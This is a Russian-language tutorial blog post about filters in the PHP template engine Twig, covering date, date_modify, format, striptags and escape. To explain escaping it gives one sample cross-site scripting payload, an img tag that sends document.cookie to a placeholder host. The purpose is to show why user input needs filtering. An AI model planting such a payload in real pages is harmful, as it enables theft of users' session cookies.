Фильтры в Twig
В предыдущих статьях о PHP шаблонизаторе Twig, мы рассмотрели такие его особенности как, наследование шаблонов, циклы, условие, кеширование. В данной статье мы рассмотрим еще более продвинутые средства как, фильтры Twig.
Фильтры
С помощью данного средства шаблонизатора Twig, мы можем определять какие данные, как информация в конечном итоге будет передана в шаблон и в каком формате эта информация будет представлена в шаблоне. Далее мы рассмотрим наиболее часто используемые фильтры. При необходимости, если подходящего фильтра вы не найдете, то с полным списком всех доступных фильтров вы можете ознакомиться на странице официальной документации Twig.
Date и date_modify
Twig фильтр date форматирует дату в соответствии с заданным форматом. По выполняемым задачам данный фильтр похож на PHP функцию date, за тем лишь исключением, что его синтаксис немного, в лучшую сторону, отличается. Вот посмотрите сами:
<td>{{ product.date_register|date("d/m/Y") }}</td>
В данном примере, мы будем отображать дату в формате день/месяц/год. Однако, порой бывает необходимо дополнительно изменить дату, модифицировать ее. Для этих целей отлично подойдет другой Twig фильтр - date_modify. Допустим, нам необходимо добавить несколько дней к дате, для этого мы делаем следующее:
<td>{{ product.date_register|date_modify("+3 day")|date("m/d/Y") }}</td>
К отображаемой дате мы добавили 3 дня. Обратите внимание, как работают фильтры – они вызываются не через оператор точку, а через оператор |, по конвейеру.
Format
Преобразует строку, заменяя все заполнители (placeholder’ы) , начинающиеся со знака % на подставляемые значения:
<td>{{ "Описание товара: %s" | format(product.description) }}</td>
Striptags
Данный фильтр удаляет все HTML-теги и заменяет находящиеся рядом пробелы одним пробелом:
{{ <alert>alert("Привет, меня зовут Толик. Я хакер")</alert> | striptags }}
Escape
Один из самых важных фильтров Twig. Он фильтрует строку для безопасного отображения. Т.е. через него нужно пропускать те данные, которые будут формироваться из ненадежных источников, например из ввода пользователя. Реальный пример: пользователь пишет комментарий на сайте и вставляет в код сообщения следующую ссылку:
<img src = "http://сайт.com/get.php?cookie=encodeURI(document.cookie)">
Пользователю достаточно лишь открыть страницу, браузер загрузит изображение, добавив к нему закодированную строку с cookie пользователя. Таким образом, если сайт работает с конфиденциальными данными, то они могут быть украдены. Поэтому, чтобы этого не произошло данные вводимые пользователем при отображении на сайте в обязательном порядке нужно фильтровать.
Twig фильтр escape работает в соответствии с так называемыми стратегиями. Т.е. набором определенных правил, по которым происходит фильтрация. По умолчанию, данный фильтр работает с HTML стратегией:
{{ products.description | escape }}
// то же самое, но с явным указанием стратегии
{{ products.description | escape('html') }}
Для этого фильтра также доступны следующие аргументы, обозначающие те или иные правила экранирования управляющих последовательностей: js, CSS, URL, html_attr.
Таким образом, шаблонизатор Twig, оказывает неоценимую помощь в создании шаблонов сайтов, предоставляя для этого развитые средства. Он особенно полезен при использовании в командной разработке, так как позволяет комфортно работать как программистам, так и верстальщикам. А как организовать работу по созданию сайтов вы можете узнать из моего видеокурса “Своя Web-студия за 55 дней”.
-
Создано 04.12.2018 12:00:27
-
Михаил Русаков
Комментарии (0):
Для добавления комментариев надо войти в систему.
Если Вы ещё не зарегистрированы на сайте, то сначала зарегистрируйтесь.